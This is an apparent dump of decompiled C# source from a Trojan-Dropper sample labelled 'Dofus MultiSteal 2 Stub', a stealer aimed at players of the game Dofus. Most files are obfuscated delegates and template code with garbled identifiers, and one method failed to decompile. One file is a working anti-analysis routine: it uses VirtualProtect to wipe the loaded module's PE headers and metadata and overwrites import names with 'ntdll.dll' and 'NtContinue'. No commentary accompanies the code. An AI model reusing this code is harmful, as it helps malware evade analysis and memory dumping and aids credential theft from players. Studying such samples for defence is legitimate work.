// Decompiled with JetBrains decompiler
// Type: ᆔኾꗘ몇砍섕뢅㋐
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
using System.Runtime.InteropServices;
internal delegate Type \u32D0([In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᇿ⌳髲ꄇꂏ᫈.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᇿ⌳髲ꄇꂏ᫈
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate long \u2333髲ꄇꂏ\uE716\uE924\u1AC8(int _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ኩ㰞샧뼈ᓠ哔忨.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ኩ㰞샧뼈ᓠ哔忨
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate int \uF61F㰞샧뼈ᓠ哔忨([In] object obj0, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Ꭿ﷓揼喣蛲㿶.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: Ꭿ﷓揼喣蛲㿶
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
internal delegate Random \uE26C\uFDD3揼喣蛲\uE8CD㿶(int _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᑵ飯쳥䙯컇訲ﶕ.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᑵ飯쳥䙯컇訲ﶕ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate \uEB1D縏냹௧岽\uF75E䄃\uF16B \uF2D7쳥䙯컇訲ﶕ();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᒶ䡋IJ蔶ਪ砽훬쇩.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: ᒶ䡋IJ蔶ਪ砽훬쇩
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Drawing;
using System.Drawing.Imaging;
internal delegate Bitmap IJ(int _param1, int _param2, PixelFormat _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᓨﴢﶥ᯼敃�例ꋻ.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᓨﴢﶥ᯼敃例ꋻ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void \u1BFC敃\uFFFD例ꋻ([In] object obj0, string _param2, string _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᔒɉ曯絇쭥毄힘骕.cs
+170
View File
@@ -0,0 +1,170 @@
// Decompiled with JetBrains decompiler
// Type: ᔒɉ曯絇쭥毄힘骕
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class ɉ
{
private static readonly ɉ.\uF352\u2044鳟付뷁<\u324E㞞摎항ᢋ> \uF24F\u3346긤斬 = new ɉ.\uF352\u2044鳟付뷁<\u324E㞞摎항ᢋ>();
private static readonly ɉ.\uF352\u2044鳟付뷁<\uEB1D縏냹௧岽\uF75E䄃\uF16B> \uFFFD騣릸\uE253밧짂逓\u089B = new ɉ.\uF352\u2044鳟付뷁<\uEB1D縏냹௧岽\uF75E䄃\uF16B>();
private static readonly ɉ.\uF352\u2044鳟付뷁<User> \u1DD1ꈺ쓶힝ҁ㭓䗻\uFFFD = new ɉ.\uF352\u2044鳟付뷁<User>();
private static ɉ.\uF352\u2044鳟付뷁<ɉ.> Ѭi氻꺺覲 = new ɉ.\uF352\u2044鳟付뷁<ɉ.>();
private static readonly ɉ.\uF352\u2044鳟付뷁<ɉ.θ\u22F9耋靠絟讏푞ⵚ> = new ɉ.\uF352\u2044鳟付뷁<ɉ.θ\u22F9耋靠絟讏푞ⵚ>();
[HelpKeyword("My.Computer")]
internal static \u324E㞞摎항ᢋ R
{
[DebuggerHidden] get => ɉ.\uF24F\u3346긤斬.\u0D77摎\uF162ᇝ;
}
[HelpKeyword("My.Application")]
internal static \uEB1D縏냹௧岽\uF75E䄃\uF16B \uFFFDᖽ䚏
{
[DebuggerHidden] get => ɉ.\uFFFD騣릸\uE253밧짂逓\u089B.\u0D77摎\uF162ᇝ;
}
[HelpKeyword("My.User")]
internal static User \uE727\uF1C3ᷳ퓴\uEE16\u21F3
{
[DebuggerHidden] get => ɉ.\u1DD1ꈺ쓶힝ҁ㭓䗻\uFFFD.\u0D77摎\uF162ᇝ;
}
[HelpKeyword("My.Forms")]
internal static ɉ. \uE329硝\uF1BB鴹爯ણ짍
{
[DebuggerHidden] get => ɉ.Ѭi氻꺺覲.\u0D77摎\uF162ᇝ;
}
[HelpKeyword("My.WebServices")]
internal static ɉ.θ\u22F9耋靠絟讏푞ⵚ \u2783쐀נּ頮伺
{
[DebuggerHidden] get => ɉ..\u0D77摎\uF162ᇝ;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class
{
public \uE576\u3015\u2764ྵ\u225D泐 Լ\uE471鷜彑;
[ThreadStatic]
private static Hashtable \u2ECD鴫\u2BAD;
public \uE576\u3015\u2764ྵ\u225D泐 \uFFFDퟬ\uF58F
{
get
{
this.Լ\uE471鷜彑 = ɉ.๔.Ȑ\uE3E0鐁㵆<\uE576\u3015\u2764ྵ\u225D泐>(this.Լ\uE471鷜彑);
return this.Լ\uE471鷜彑;
}
set
{
if (value == this.Լ\uE471鷜彑)
return;
if (value != null)
throw \uF6CC붘笭ⷭ\uF89F涡佀怸.\uEC0B蝂ヸ洢嗀\uE2FD襵쟱((string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(938127404U));
this.\uF19B虩ᶩ\u212E掺ꄀ<\uE576\u3015\u2764ྵ\u225D泐>(ref this.Լ\uE471鷜彑);
}
}
[DebuggerHidden]
private static T Ȑ\uE3E0鐁㵆<T>(T _param0) where T : Form, new()
{
// ISSUE: unable to decompile the method.
}
[DebuggerHidden]
private void \uF19B虩ᶩ\u212E掺ꄀ<T>(ref T _param1) where T : Form
{
_param1.Dispose();
_param1 = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => \uA8E3ろ鏠\uFFFD믍\u23DCᗘ\uF352.\uEFFEꭣ䐈윿ీ蘳盰((object) this, ٽ\uECD1倵嶒.ʳ(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => \u32A1\uF31F郃ǖ䱕霏\u1365.\uEA9F끧ꈅ\uFFFD狈ꜘ((object) this);
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => \uA7DFb妑ઽᖷ諛ɚꂃ.\u283F\u2629(__typeref (ɉ.));
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => \uFE02풊ਸ਼塘\u9FD7筱麮Ẵ.\uE1FC㫜ᑼ㡷\u2EBB捜怌\u2AE5((object) this);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class θ\u22F9耋靠絟讏푞ⵚ
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => \uA8E3ろ鏠\uFFFD믍\u23DCᗘ\uF352.\uEFFEꭣ䐈윿ీ蘳盰((object) this, ٽ\uECD1倵嶒.ʳ(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => \u32A1\uF31F郃ǖ䱕霏\u1365.\uEA9F끧ꈅ\uFFFD狈ꜘ((object) this);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => \uA7DFb妑ઽᖷ諛ɚꂃ.\u283F\u2629(__typeref (ɉ.θ\u22F9耋靠絟讏푞ⵚ));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => \uFE02풊ਸ਼塘\u9FD7筱麮Ẵ.\uE1FC㫜ᑼ㡷\u2EBB捜怌\u2AE5((object) this);
[DebuggerHidden]
private static T Ȑ\uE3E0鐁㵆<T>(T _param0) where T : new() => (object) _param0 == null ? new T() : _param0;
[DebuggerHidden]
private void \uF19B虩ᶩ\u212E掺ꄀ<T>(ref T _param1) => _param1 = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public θ\u22F9耋靠絟讏푞ⵚ()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class \uF352\u2044鳟付뷁<T> where T : new()
{
internal T \u0D77摎\uF162ᇝ
{
[DebuggerHidden] get
{
if ((object) ɉ.\uF352\u2044鳟付뷁<T>.\u2AD2坳瞱\u251B㴬뉢 == null)
ɉ.\uF352\u2044鳟付뷁<T>.\u2AD2坳瞱\u251B㴬뉢 = new T();
return ɉ.\uF352\u2044鳟付뷁<T>.\u2AD2坳瞱\u251B㴬뉢;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public \uF352\u2044鳟付뷁()
{
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᘬ췯䍸謔䱩ຌ豊.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᘬ췯䍸謔䱩ຌ豊
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void \u0E8C豊\uE043([In] object obj0, bool _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᚚỘ﫳�쪤噧풨겆.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᚚỘ﫳쪤噧풨겆
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate string \uFAF3\uFFFD쪤噧풨겆(char _param1, int _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᛁ䬒߁✺摎䂔.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᛁ䬒߁✺摎䂔
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Diagnostics;
internal delegate Process[] \uE054\uF174߁\u273A摎䂔(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᛱ㭔棛ꑛ鿚頒鴰.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᛱ㭔棛ꑛ鿚頒鴰
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.IO;
internal delegate StreamWriter \uEBBFꑛ\u9FDA頒鴰(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᡸ£仪缃졋.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᡸ£仪缃졋
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate void \u1878\uFFE1仪缃졋\uF81E\uF4DC\uEBD8(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᢊ㑕饍랖鏨밇䨡⁀.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᢊ㑕饍랖鏨밇䨡⁀
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void ([In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᤂ낾藭ﵹ䍕ﴍ搟톴.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᤂ낾藭ﵹ䍕ﴍ搟톴
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
internal delegate Random (int _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/᤮ᯬ�㍇䡯運ப.cs
+253
View File
@@ -0,0 +1,253 @@
// Decompiled with JetBrains decompiler
// Type: ᤮ᯬ㍇䡯運ப
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
using System.Runtime.InteropServices;
internal static class \u192E\uF515\uFFFD\u3347䡯運ப
{
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
private static extern unsafe bool \uE5A9甪芌䆃ᡅ(
byte* lpAddress,
int dwSize,
uint flNewProtect,
out uint lpflOldProtect);
public static unsafe void \u2100䦀簴Ṽ芹()
{
byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\u192E\uF515\uFFFD\u3347䡯運ப).Module);
byte* numPtr1 = hinstance + 60;
byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6;
ushort length = *(ushort*) numPtr2;
byte* numPtr3 = numPtr2 + 14;
ushort num1 = *(ushort*) numPtr3;
byte* numPtr4 = numPtr3 + 4 + (int) num1;
// ISSUE: untyped stack allocation
byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr5 = 1818522734;
*(int*) (numPtr5 + 4) = 1818504812;
*(short*) (numPtr5 + 8) = (short) 108;
numPtr5[10] = (byte) 0;
// ISSUE: untyped stack allocation
byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr6 = 1866691662;
*(int*) (numPtr6 + 4) = 1852404846;
*(short*) (numPtr6 + 8) = (short) 25973;
numPtr6[10] = (byte) 0;
if (typeof (\u192E\uF515\uFFFD\u3347䡯運ப).Module.FullyQualifiedName != "<Unknown>")
{
uint lpflOldProtect;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
if (*(uint*) (numPtr4 - 120) != 0U)
goto label_71;
label_52:
for (int index = 0; index < (int) length; index++)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numPtr4 += 40;
}
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress1, 72, 64U, out lpflOldProtect);
byte* lpAddress2 = hinstance + (int) *(uint*) (lpAddress1 + 8);
*(int*) lpAddress1 = 0;
*(int*) (lpAddress1 + 4) = 0;
*(int*) (lpAddress1 + 8) = 0;
*(int*) (lpAddress1 + 12) = 0;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress2, 4, 64U, out lpflOldProtect);
*(int*) lpAddress2 = 0;
byte* numPtr7 = lpAddress2 + 12;
byte* numPtr8 = (byte*) ((ulong) ((uint) (numPtr7 + (int) *(uint*) numPtr7) + 7U) & 18446744073709551612UL) + 2;
ushort num2 = (ushort) *numPtr8;
byte* lpAddress3 = numPtr8 + 2;
for (int index1 = 0; index1 < (int) num2; ++index1)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress3, 8, 64U, out lpflOldProtect);
*(int*) lpAddress3 = 0;
byte* numPtr9 = lpAddress3 + 4;
*(int*) numPtr9 = 0;
lpAddress3 = numPtr9 + 4;
for (int index2 = 0; index2 < 8; index2++)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress3, 4, 64U, out lpflOldProtect);
*lpAddress3 = (byte) 0;
byte* numPtr10 = lpAddress3 + 1;
if (*numPtr10 == (byte) 0)
{
lpAddress3 = numPtr10 + 3;
break;
}
*numPtr10 = (byte) 0;
byte* numPtr11 = numPtr10 + 1;
if (*numPtr11 == (byte) 0)
{
lpAddress3 = numPtr11 + 2;
break;
}
*numPtr11 = (byte) 0;
byte* numPtr12 = numPtr11 + 1;
if (*numPtr12 == (byte) 0)
{
lpAddress3 = numPtr12 + 1;
break;
}
*numPtr12 = (byte) 0;
lpAddress3 = numPtr12 + 1;
}
}
return;
label_71:
byte* numPtr13 = hinstance + (int) *(uint*) (numPtr4 - 120);
byte* numPtr14 = hinstance + (int) *(uint*) numPtr13;
byte* lpAddress4 = hinstance + (int) *(uint*) (numPtr13 + 12);
byte* lpAddress5 = hinstance + (int) *(uint*) numPtr14 + 2;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress4, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
lpAddress4[index] = numPtr5[index];
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress5, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; index++)
lpAddress5[index] = numPtr6[index];
goto label_52;
}
else
{
uint lpflOldProtect;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
uint num3 = *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
uint num4 = *(uint*) (numPtr4 - 120);
uint[] numArray1 = new uint[(int) length];
uint[] numArray2 = new uint[(int) length];
uint[] numArray3 = new uint[(int) length];
for (int index = 0; index < (int) length; index++)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numArray1[index] = *(uint*) (numPtr4 + 12);
numArray2[index] = *(uint*) (numPtr4 + 8);
numArray3[index] = *(uint*) (numPtr4 + 20);
numPtr4 += 40;
}
if (num4 != 0U)
{
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index])
{
num4 = num4 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr15 = hinstance + (int) num4;
uint num5 = *(uint*) numPtr15;
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index])
{
num5 = num5 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr16 = hinstance + (int) num5;
uint num6 = *(uint*) (numPtr15 + 12);
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num6 && num6 < numArray1[index] + numArray2[index])
{
num6 = num6 - numArray1[index] + numArray3[index];
break;
}
}
uint num7 = *(uint*) numPtr16 + 2U;
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index])
{
num7 = num7 - numArray1[index] + numArray3[index];
break;
}
}
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(hinstance + (int) num6, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
(hinstance + (int) num6)[index] = numPtr5[index];
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(hinstance + (int) num7, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
(hinstance + (int) num7)[index] = numPtr6[index];
}
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index])
{
num3 = num3 - numArray1[index] + numArray3[index];
break;
}
}
byte* lpAddress6 = hinstance + (int) num3;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress6, 72, 64U, out lpflOldProtect);
uint num8 = *(uint*) (lpAddress6 + 8);
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index])
{
num8 = num8 - numArray1[index] + numArray3[index];
break;
}
}
*(int*) lpAddress6 = 0;
*(int*) (lpAddress6 + 4) = 0;
*(int*) (lpAddress6 + 8) = 0;
*(int*) (lpAddress6 + 12) = 0;
byte* lpAddress7 = hinstance + (int) num8;
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress7, 4, 64U, out lpflOldProtect);
*(int*) lpAddress7 = 0;
byte* numPtr17 = lpAddress7 + 12;
byte* numPtr18 = (byte*) ((ulong) ((uint) (numPtr17 + (int) *(uint*) numPtr17) + 7U) & 18446744073709551612UL) + 2;
ushort num9 = (ushort) *numPtr18;
byte* lpAddress8 = numPtr18 + 2;
for (int index3 = 0; index3 < (int) num9; index3++)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress8, 8, 64U, out lpflOldProtect);
*(int*) lpAddress8 = 0;
byte* numPtr19 = lpAddress8 + 4;
*(int*) numPtr19 = 0;
lpAddress8 = numPtr19 + 4;
for (int index4 = 0; index4 < 8; ++index4)
{
\u192E\uF515\uFFFD\u3347䡯運ப.\uE5A9甪芌䆃ᡅ(lpAddress8, 4, 64U, out lpflOldProtect);
*lpAddress8 = (byte) 0;
byte* numPtr20 = lpAddress8 + 1;
if (*numPtr20 == (byte) 0)
{
lpAddress8 = numPtr20 + 3;
break;
}
*numPtr20 = (byte) 0;
byte* numPtr21 = numPtr20 + 1;
if (*numPtr21 != (byte) 0)
{
*numPtr21 = (byte) 0;
byte* numPtr22 = numPtr21 + 1;
if (*numPtr22 == (byte) 0)
{
lpAddress8 = numPtr22 + 1;
break;
}
*numPtr22 = (byte) 0;
lpAddress8 = numPtr22 + 1;
}
else
{
lpAddress8 = numPtr21 + 2;
break;
}
}
}
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/᥀艏魿ᑵ舢팏遱㱕.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᥀艏魿ᑵ舢팏遱㱕
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
